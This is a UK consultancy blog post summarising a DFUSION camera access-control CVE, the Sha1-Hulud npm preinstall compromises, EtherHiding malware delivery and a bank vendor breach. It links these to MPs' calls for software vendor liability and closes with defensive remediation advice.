MPs Sound the Alarm: CCTV Flaw and 25,000 npm Hijacks Show Why Software Firms Must Be Held Accountable

Why a CCTV bug, 25,000 npm hijacks and MPs’ alarm bells are now part of the same security headache

Britain’s economic security debate has leapt from committee rooms to camera feeds and developer machines after a flurry of incidents this morning: a high‑severity vulnerability in Davantis’ DFUSION camera platform, mass npm preinstall hijacks affecting tens of thousands of repositories, and renewed calls from MPs that software vendors must be held to account for national economic resilience. It’s the kind of perfect storm that keeps cyber teams awake — and we at Synergos Consultancy have been quietly stocking up on strong coffee and sound advice.

The immediate worry: CVE‑2025‑41016 exposes camera footage

Published 44 minutes ago, CVE‑2025‑41016 affects Davantis DFUSION v6.177.7 and is rated 8.7 (HIGH). According to the advisory supplied, an inadequate access control flaw allows unauthorised actors to retrieve images and videos tied to alarm events via the “/alarms//” endpoint when the MEDIA parameter is set to “snapshot” or “video.mp4”. In plain English: footage recorded by security cameras in response to alerts can be pulled out by someone who ought not to have access.

That’s not just an embarrassment for a vendor; it’s an operational and privacy risk for any organisation that relies on that kit for perimeter detection or forensic evidence. Imagine a burglar getting the CCTV feed of the very alarm that would have caught them — awkward for insurers, worse for operations.

Supply‑chain sightings: Sha1‑Hulud and EtherHiding

At the same time, security vendors are warning that Sha1‑Hulud has compromised more than 25,000 GitHub repositories via malicious npm preinstall packages, designed to steal cloud credentials or even wipe developers’ home directories. This is supply‑chain nastiness at scale: a single poisoned dependency can turn a dev machine into a vault of credentials.

Meanwhile, the EtherHiding technique is being used to deliver and rotate malware payloads via web pages disguised as CAPTCHAs, with blockchain smart contracts used to update the malicious code. It’s clever, it’s ugly, and it underlines how attackers are blending decentralised tech with social‑engineering vectors.

Why MPs are shouting about vendor liability — and why it matters

An influential committee of MPs has warned that the lack of liability for software vendors is putting Britain’s economic and national security at risk. Their argument is straightforward: when vendors face little legal or financial consequence for unsafe design, critical systems remain fragile and the wider economy becomes exposed.

Those concerns feed directly into today’s technical stories. A vulnerability that exposes camera footage is more than a product bug — it’s a potential national‑security and privacy incident when cameras sit on critical infrastructure or within supply‑chain partners. Likewise, mass npm compromises show how weaknesses in the software ecosystem ripple outwards.

Third‑party vendor attacks: banks and beyond

Also reported today: several major banks have been affected by a cyber‑attack on a third‑party tech vendor, potentially exposing customer data. This is another piece of the same puzzle — when vendors or contractors aren’t held to rigorous standards, downstream organisations pay the price.

Expert reminder: good processes beat glamour tech

As Greg Van Der Gaast, Managing Director of Sequoia Consulting and former hacker, observed: many attackers will simply wait for a vulnerability to appear; what matters is how quickly organisations find and fix those issues. Well‑designed systems and fast remediation reduce the window of opportunity for attackers — a lesson that applies whether you’re running CCTV platforms, cloud workloads, or npm packages.

Practical steps Synergos Consultancy would be emphasising right now

1. Prioritise immediate risk triage for exposed assets: identify any DFUSION instances, isolate them, and treat logs and footage as potentially compromised evidence.
2. Apply vendor‑supplied patches or mitigations where available, and if none exist, implement compensating controls such as network segmentation and strict media access controls.
3. Harden developer environments: block untrusted preinstall scripts, audit dependencies, and apply least privilege to CI/CD and cloud credentials.
4. Review third‑party risk: confirm which suppliers have access to sensitive data and test contractual liability, insurance and incident response obligations.
5. Exercise incident response and evidence preservation plans — camera footage, like logs, can be both evidence and proof of compromise.

We’re not pretending process is sexy, but as the old adage goes, prevention is cheaper than forensics — and far less embarrassing.

What organisations in the UK should watch next

• MPs’ recommendations and any moves to enshrine vendor liability in law — this could change procurement and contractual risk apportionment.
• Vendor advisories for Davantis DFUSION and any patches or mitigation guidance they release.
• Indicators of compromise for Sha1‑Hulud and EtherHiding, plus any related advisories from major security vendors.
• Notifications from financial institutions or their vendors about the scale and nature of the third‑party incident affecting banks.

There’s a policy angle too: calls for an Economic Security Bill and a dedicated Economic Security Minister suggest lawmakers want bite as well as bark. If liability becomes law, suppliers will face greater pressure to design securely rather than rely on post‑facto fixes — and that’s exactly the sort of structural change that could cut down the noise of repeat incidents.

If you want a straight answer from Synergos Consultancy: strengthen your basic hygiene, hunt for exposed camera platforms, lock down developer environments, and treat vendor contracts like part of your defensive architecture. It’s not glamorous, but it works.

Breaches, leaks and clever malware are the new normal; what’s not normal is accepting that vendors can ship fragile software without accountability. Today’s trio of stories — CVE‑2025‑41016, Sha1‑Hulud mass compromises, and the vendor‑related bank incident — are a reminder that technical detail, legal frameworks and good process must all line up, otherwise we’re simply handing attackers the keys and asking them politely to leave when they’re done.

The industry will talk, regulators will consider next steps, and practitioners will patch and monitor. In the meantime, keep an eye on your cameras — and perhaps don’t invite the burglars to the viewing party.